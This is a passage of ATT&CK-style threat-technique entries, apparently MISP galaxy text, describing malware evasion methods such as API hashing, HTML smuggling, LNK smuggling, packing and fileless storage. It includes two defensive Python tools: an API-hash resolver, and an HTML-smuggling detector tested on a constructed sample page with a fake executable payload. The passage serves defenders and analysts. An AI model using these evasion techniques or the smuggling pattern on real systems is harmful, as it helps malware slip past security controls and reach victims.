Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered via [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (e.g., EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.<sup>[[TrendMicro WindowsAppMac](https://app.tidalcyber.com/references/dc673650-1a37-4af1-aa03-8f57a064156b)]</sup>

The tag is: misp-galaxy:technique="Compile After Delivery"

Dynamic API Resolution

Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.

API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.<sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup><sup>[[IRED API Hashing](https://app.tidalcyber.com/references/1b8b87d5-1b70-401b-8850-d8afd3b22356)]</sup>

To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://app.tidalcyber.com/technique/9ed5db23-3b2a-4a08-8602-bc8dff5c80f0), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.

Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as GetProcAddress() and LoadLibrary(). These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) during execution).<sup>[[BlackHat API Packers](https://app.tidalcyber.com/references/fc4434c0-373b-42fe-a0f5-683c24fa329e)]</sup><sup>[[Drakonia HInvoke](https://app.tidalcyber.com/references/11d936fd-aba0-4eed-8007-aca71c340c59)]</sup><sup>[[Huntress API Hash](https://app.tidalcyber.com/references/e9f91661-29e3-408e-bfdd-c7df22f3f400)]</sup>
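Analysts counter API hashing by precomputing a hash-to-name table from a module's export list and resolving the constants found in a sample. The following is an added example (not from the MISP galaxy or the cited write-ups) that does this for two hash routines; the ROR13 variant here hashes the ASCII function name only, and the export list is a constructed subset, not a real export table.

```python
from typing import Callable, Dict, List, Optional

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(name: str) -> int:
    """ROR13 hash over the ASCII function name, the form used by many
    shellcode-style loaders. Some variants also fold in the trailing NUL or
    the module name, so confirm the variant against the sample being analyzed."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


def djb2_hash(name: str) -> int:
    """djb2 (h * 33 + c), another routine seen in API-resolution stubs."""
    h = 5381
    for byte in name.encode("ascii"):
        h = (h * 33 + byte) & MASK32
    return h


HASHERS: Dict[str, Callable[[str], int]] = {"ror13": ror13_hash, "djb2": djb2_hash}


def build_lookup(exports: List[str], algorithm: str) -> Dict[int, str]:
    """Precompute hash -> name for an export list so hashes pulled from a sample
    can be resolved offline; a collision would make a lookup ambiguous, so fail loudly."""
    hasher = HASHERS[algorithm]
    table: Dict[int, str] = {}
    for name in exports:
        h = hasher(name)
        if h in table and table[h] != name:
            raise ValueError(f"collision for 0x{h:08x}: {table[h]} / {name}")
        table[h] = name
    return table


def resolve(hashes: List[int], table: Dict[int, str]) -> Dict[int, Optional[str]]:
    """Map each hash constant to an export name, or None if the table lacks it."""
    return {h: table.get(h) for h in hashes}


# Constructed export list: a handful of kernel32 names, not a full export table.
SAMPLE_EXPORTS = ["LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                  "VirtualProtect", "CreateThread", "WriteProcessMemory"]

if __name__ == "__main__":
    table = build_lookup(SAMPLE_EXPORTS, "ror13")
    # Hash constants as they would be lifted from a sample (computed here for the demo).
    seen = [ror13_hash("VirtualAlloc"), ror13_hash("CreateThread")]
    for h, name in resolve(seen, table).items():
        print(f"0x{h:08x} -> {name}")
```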

The tag is: misp-galaxy:technique="Dynamic API Resolution"

Embedded Payloads

Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://app.tidalcyber.com/technique/73a8b954-93fe-466c-b73d-bd35bb08c3e7) by not impacting execution controls such as digital signatures and notarization tickets.<sup>[[Sentinel Labs](https://app.tidalcyber.com/references/785f7692-2be8-4f5d-921e-51efdfe0c0b9)]</sup>

Adversaries may embed payloads in various file formats to hide payloads.<sup>[[Microsoft Learn](https://app.tidalcyber.com/references/73ba4e07-cfbd-4b23-b52a-1ebbd7cc0fe4)]</sup> This is similar to [Steganography](https://app.tidalcyber.com/technique/f22d0738-dcb7-40c2-99cf-b426ac54224a), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.<sup>[[GitHub PSImage](https://app.tidalcyber.com/references/449c873c-c5af-45b8-8bd7-505d2181a05c)]</sup>

For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.<sup>[[Securelist Dtrack2](https://app.tidalcyber.com/references/a011b68a-30e0-4204-9bf3-fa73f2a238b4)]</sup> Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup>

Embedded content may also be used as [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) payloads used to infect benign system processes.<sup>[[Trend Micro](https://app.tidalcyber.com/references/2d4cb6f1-bc44-454b-94c1-88a81324903e)]</sup> These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.<sup>[[Malware Analysis Report ComRAT](https://app.tidalcyber.com/references/9d81e2c8-09d5-4542-9c60-13a22a5a0073)]</sup>

The tag is: misp-galaxy:technique="Embedded Payloads"

Fileless Storage

Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or the WMI repository.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup><sup>[[SecureList Fileless](https://app.tidalcyber.com/references/03eb080d-0b83-5cbb-9317-c50b35996c9b)]</sup>

Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://app.tidalcyber.com/technique/ef85800b-080d-4739-9f3b-91b61314a93e) and [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.

Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://app.tidalcyber.com/technique/8e32b6ed-58b1-4708-8b86-bd29c3a544d2)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.

Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., %SystemRoot%\System32\Wbem\Repository) or Registry (e.g., %SystemRoot%\System32\Config) physical files.<sup>[[Microsoft Fileless](https://app.tidalcyber.com/references/263fc1ab-f928-583f-986d-1e1bae9b3c85)]</sup>

The tag is: misp-galaxy:technique="Fileless Storage"

HTML Smuggling

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline in HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup>

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920)), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files on the victim machine, which may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.<sup>[[HTML Smuggling Menlo Security 2020](https://app.tidalcyber.com/references/a9fc3502-66c2-4504-9886-458f8a803b5d)]</sup><sup>[[MSTIC NOBELIUM May 2021](https://app.tidalcyber.com/references/047ec63f-1f4b-4b57-9ab5-8a5cfcc11f4d)]</sup><sup>[[Outlflank HTML Smuggling 2018](https://app.tidalcyber.com/references/9a99f431-4d15-47f8-a31b-4f98671cd95d)]</sup><sup>[[nccgroup Smuggling HTA 2017](https://app.tidalcyber.com/references/f5615cdc-bc56-415b-8e38-6f3fd1c33c88)]</sup>
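Because the carrier arrives as `text/html`, a content filter has to look inside the document for the mechanism plus the encoded payload. The following added example (not from the MISP galaxy or the cited reports) does that: it spots the Blob, `download`-attribute, Data URL and `msSaveBlob` markers, decodes long base64 literals, and sniffs their magic bytes. The sample HTML and its fake "MZ" payload are constructed for the demonstration.

```python
import base64
import re
from dataclasses import dataclass, field

# Markers of the client-side file-dropping mechanisms described above.
MECHANISM_PATTERNS = {
    "js_blob": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "ms_save_blob": re.compile(r"msSave(?:OrOpen)?Blob\s*\("),
    "download_attr": re.compile(r"<a\b[^>]*\bdownload\b", re.IGNORECASE),
    "data_url_b64": re.compile(r"data:[\w/.+-]+;base64,", re.IGNORECASE),
    "atob": re.compile(r"\batob\s*\("),
}

# A base64 run this long is a payload candidate rather than an ordinary token.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")

# Magic bytes that reveal what a decoded literal really is.
MAGIC = [
    (b"MZ", "PE executable (MZ)"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"\x7fELF", "ELF executable"),
    (b"%PDF", "PDF document"),
]


@dataclass
class SmugglingReport:
    mechanisms: list = field(default_factory=list)     # delivery markers seen
    decoded_types: list = field(default_factory=list)  # types of decoded literals
    suspicious: bool = False


def sniff_type(data: bytes) -> str:
    """Label decoded bytes by their leading magic; 'unknown' if none matches."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"


def analyze_html(html: str) -> SmugglingReport:
    """Flag HTML that pairs a Blob/download/Data-URL drop mechanism with an
    embedded base64 literal that decodes to an executable or archive."""
    report = SmugglingReport()
    for name, pattern in MECHANISM_PATTERNS.items():
        if pattern.search(html):
            report.mechanisms.append(name)
    for literal in B64_LITERAL.findall(html):
        try:
            decoded = base64.b64decode(literal, validate=True)
        except ValueError:  # not valid base64 after all (bad length/padding)
            continue
        report.decoded_types.append(sniff_type(decoded))
    carries_binary = any(t != "unknown" for t in report.decoded_types)
    report.suspicious = bool(report.mechanisms) and carries_binary
    return report


# Constructed sample input: a fake "MZ" header plus filler, not a real program,
# wrapped in the Blob + download-attribute pattern the text describes.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"constructed placeholder, not executable code"
SAMPLE_HTML = f"""<html><body>
<a id="dl" download="invoice.pdf">report</a>
<script>
  var b64 = "{base64.b64encode(FAKE_PE).decode()}";
  var bytes = Uint8Array.from(atob(b64), function (c) {{ return c.charCodeAt(0); }});
  var blob = new Blob([bytes]);
  document.getElementById("dl").href = URL.createObjectURL(blob);
</script>
</body></html>"""

if __name__ == "__main__":
    r = analyze_html(SAMPLE_HTML)
    print("mechanisms:", r.mechanisms)
    print("decoded types:", r.decoded_types)
    print("suspicious:", r.suspicious)
```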

The tag is: misp-galaxy:technique="HTML Smuggling"

Indicator Removal from Tools

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

The tag is: misp-galaxy:technique="Indicator Removal from Tools"

LNK Icon Smuggling

Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign Windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the IconEnvironmentDataBlock) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory.

Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c)/[System Binary Proxy Execution](https://app.tidalcyber.com/technique/4060ad55-7ff1-4127-acad-808b2bc77655) arguments within the target path field of the LNK.<sup>[[Unprotect Shortcut](https://app.tidalcyber.com/references/b62d40bc-2782-538a-8913-429908c6a2ee)]</sup><sup>[[Booby Trap Shortcut 2017](https://app.tidalcyber.com/references/1a820fb8-3cff-584b-804f-9bad0592873b)]</sup>

LNK Icon Smuggling may also be utilized post-compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.

The tag is: misp-galaxy:technique="LNK Icon Smuggling"

Software Packing

Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable’s original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.<sup>[[ESET FinFisher Jan 2018](https://app.tidalcyber.com/references/be169308-19e8-4ee9-8ff6-e08eb9291ef8)]</sup>

Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.<sup>[[Awesome Executable Packing](https://app.tidalcyber.com/references/565bf600-5657-479b-9678-803e991c88a5)]</sup>

The tag is: misp-galaxy:technique="Software Packing"

Steganography

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server.<sup>[[Wikipedia Duqu](https://app.tidalcyber.com/references/5cf0101e-c036-4c1c-b322-48f04e2aef0b)]</sup>

By the end of 2017, a threat group used <code>Invoke-PSImage</code> to hide [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary.<sup>[[McAfee Malicious Doc Targets Pyeongchang Olympics](https://app.tidalcyber.com/references/e6b5c261-86c1-4b6b-8a5e-c6a454554588)]</sup>

The tag is: misp-galaxy:technique="Steganography"

Stripped Payloads

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human-readable information. Scripts and executables may contain variable names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.<sup>[[Mandiant golang stripped binaries explanation](https://app.tidalcyber.com/references/60eb0109-9655-41ab-bf76-37b17bf9594a)]</sup><sup>[[intezer stripped binaries elf files 2018](https://app.tidalcyber.com/references/2d1faa93-fed5-4b0d-b6c9-72bbc4782201)]</sup>

Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.<sup>[[SentinelLabs reversing run-only applescripts 2021](https://app.tidalcyber.com/references/34dc9010-e800-420c-ace4-4f426c915d2f)]</sup>

The tag is: misp-galaxy:technique="Stripped Payloads"

Obfuscated Files or Information

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user’s action may be required to open and [Deobfuscate/Decode Files or Information](https://app.tidalcyber.com/technique/88c2fb46-877a-4005-8425-7639d0da1920) for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.<sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup> Adversaries may also use compressed or archived scripts, such as JavaScript.

Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.<sup>[[Linux/Cdorked.A We Live Security Analysis](https://app.tidalcyber.com/references/f76fce2e-2884-4b50-a7d7-55f08b84099c)]</sup> Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.<sup>[[Carbon Black Obfuscation Sept 2016](https://app.tidalcyber.com/references/bed8ae68-9738-46fb-abc9-0004fa35636a)]</sup>

Adversaries may also abuse [Command Obfuscation](https://app.tidalcyber.com/technique/d8406198-626c-5659-945e-2b5105fcd0c9) to obscure commands executed from payloads or directly via [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms.<sup>[[FireEye Obfuscation June 2017](https://app.tidalcyber.com/references/6d1089b7-0efe-4961-8abc-22a882895377)]</sup><sup>[[FireEye Revoke-Obfuscation July 2017](https://app.tidalcyber.com/references/e03e9d19-18bb-4d28-8c96-8c1cef89a20b)]</sup><sup>[[PaloAlto EncodedCommand March 2017](https://app.tidalcyber.com/references/069ef9af-3402-4b13-8c60-b397b0b0bfd7)]</sup>

The tag is: misp-galaxy:technique="Obfuscated Files or Information"

Code Signing Certificates

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.<sup>[[Wikipedia Code Signing](https://app.tidalcyber.com/references/363e860d-e14c-4fcd-985f-f76353018908)]</sup> Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://app.tidalcyber.com/technique/9449c0d5-7445-45e0-9861-7aafd6531733), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: misp-galaxy:technique="Code Signing Certificates"

Digital Certificates - Duplicate2

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53) with [Web Protocols](https://app.tidalcyber.com/technique/9a21ec7b-9714-4073-9bf3-4df41995c698)) or even enabling [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://app.tidalcyber.com/technique/3a956db0-a3f0-442a-a981-db2ee20d60b2)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup> Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.<sup>[[Let’s Encrypt FAQ](https://app.tidalcyber.com/references/96e1ccb9-bd5c-4716-8848-4c30e6eac4ad)]</sup>

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://app.tidalcyber.com/technique/0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b)) on infrastructure under their control.

The tag is: misp-galaxy:technique="Digital Certificates - Duplicate2"

Exploits

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.<sup>[[Exploit Database](https://app.tidalcyber.com/references/38f7b3ea-9959-4dfb-8216-a745d071e7e2)]</sup><sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup><sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup>

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.<sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup><sup>[[Wired SandCat Oct 2019](https://app.tidalcyber.com/references/5f28adee-1313-48ec-895c-27341bd1071f)]</sup> In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).<sup>[[TempertonDarkHotel](https://app.tidalcyber.com/references/4de7960b-bd62-452b-9e64-b52a0d580858)]</sup>

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609), [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), [Exploitation for Defense Evasion](https://app.tidalcyber.com/technique/15b65bf2-dbe5-47bc-be09-ed97684bf391), [Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef), [Exploitation of Remote Services](https://app.tidalcyber.com/technique/51ff4ada-8a71-4801-9cb8-a6e216eaa4e4), and [Application or System Exploitation](https://app.tidalcyber.com/technique/2109de05-5b45-4519-94a2-6c04f7d88286)).

The tag is: misp-galaxy:technique="Exploits"

Malware

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:technique="Malware"

Tool

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.<sup>[[Recorded Future Beacon 2019](https://app.tidalcyber.com/references/4e554042-53bb-44d4-9acc-44c86329ac47)]</sup>

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

The tag is: misp-galaxy:technique="Tool"

Vulnerabilities

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.<sup>[[National Vulnerability Database](https://app.tidalcyber.com/references/9b42dcc6-a39c-4d74-adc3-135f9ceac5ba)]</sup>

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. obtain [Exploits](https://app.tidalcyber.com/technique/8842e2e3-c4f8-446b-821b-5930cb15d30c)) or to attempt to develop one themselves (i.e. develop [Exploits](https://app.tidalcyber.com/technique/5a57d258-0b23-431b-b50e-3150d2c0e52c)).

The tag is: misp-galaxy:technique="Vulnerabilities"

Obtain Capabilities

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.<sup>[[NationsBuying](https://app.tidalcyber.com/references/a3e224e7-fe22-48d6-9ff5-35900f06c060)]</sup><sup>[[PegasusCitizenLab](https://app.tidalcyber.com/references/d248e284-37d3-4425-a29e-5a0c814ae803)]</sup>

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.<sup>[[DiginotarCompromise](https://app.tidalcyber.com/references/3c9b7b9a-d30a-4865-a96c-6e68d9e20452)]</sup>

The tag is: misp-galaxy:technique="Obtain Capabilities"

Add-ins

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. <sup>[[Microsoft Office Add-ins](https://app.tidalcyber.com/references/99b20e30-76a8-4108-84ae-daf92058b44b)]</sup> There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. <sup>[[MRWLabs Office Persistence Add-ins](https://app.tidalcyber.com/references/a5b6ab63-0e6f-4789-a017-ceab1719ed85)]</sup><sup>[[FireEye Mail CDS 2018](https://app.tidalcyber.com/references/0af1795c-9cdd-43fa-8184-73f33d9f5366)]</sup>

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: misp-galaxy:technique="Add-ins"

Office Template Macros

Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. <sup>[[Microsoft Change Normal Template](https://app.tidalcyber.com/references/76bf3ce1-b94c-4b3d-9707-aca8a1ae5555)]</sup>

Office Visual Basic for Applications (VBA) macros <sup>[[MSDN VBA in Office](https://app.tidalcyber.com/references/9c44416d-1f3d-4d99-b497-4615ed6f5546)]</sup> can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.<sup>[[enigma0x3 normal.dotm](https://app.tidalcyber.com/references/b8339d48-699d-4043-8197-1f0435a8dca5)]</sup><sup>[[Hexacorn Office Template Macros](https://app.tidalcyber.com/references/7d558a35-a5c0-4e4c-92bf-cb2435c41a95)]</sup> Shared templates may also be stored and pulled from remote locations.<sup>[[GlobalDotName Jun 2019](https://app.tidalcyber.com/references/f574182a-5d91-43c8-b560-e84a7e941c96)]</sup>

